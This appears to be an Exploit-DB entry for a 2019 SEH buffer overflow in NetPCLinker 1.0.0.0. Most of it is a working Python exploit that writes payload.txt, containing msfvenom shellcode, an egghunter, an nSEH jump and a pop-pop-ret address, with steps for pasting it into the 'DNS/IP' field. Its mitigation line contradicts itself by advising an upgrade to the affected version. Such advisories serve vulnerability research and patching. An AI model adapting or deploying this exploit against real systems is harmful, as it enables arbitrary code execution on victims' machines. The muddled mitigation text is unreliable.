NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)

vendor:

NetPCLinker

by:

Saeed reza Zamanian

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: NetPCLinker

Affected Version From: 1.0.0.0

Affected Version To: 1.0.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:netpclinker:netpclinker:1.0.0.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows Vista SP1

2019

NetPCLinker 1.0.0.0 – Buffer Overflow (SEH Egghunter)

NetPCLinker 1.0.0.0 is vulnerable to a buffer overflow vulnerability when a long string is entered into the 'DNS/IP' field of the 'Add Client' dialog. This can be exploited to execute arbitrary code by an attacker.

Mitigation:

Upgrade to the latest version of NetPCLinker 1.0.0.0

Source

Exploit-DB raw data:

# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
# Date: 2019-06-28
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
# Software Link: https://sourceforge.net/projects/netpclinker/files/
# Version: 1.0.0.0
# Tested on: Windows Vista SP1

#!/usr/bin/python

'''
# Replicate Crash:
  1) Install and Run the application
  2) Go to second tab "Clients Control Panel"
  3) Press Add button
  4) Run the exploit , the exploit creates a text file named payload.txt
  5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
  6) Press OK . Your shellcode will be executed by pressing OK button.

'''

#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
#Bad Characters : \x0a\x0d\x33\x35\x36

shellcode = (
"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
"\x44\xbf\x0f\x56\x04\x40"
)

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nSEH = '\xEB\xAA\x90\x90' #Jump Back

# (Vista)
# PPR(ecx)  : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)

SEH =  '\x67\x4b\x49'
offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)

payload = offset+egghunter+"\x90"*50+nSEH+SEH

try:
    f=open("payload.txt","w")
    print("[+] Creating %s bytes payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")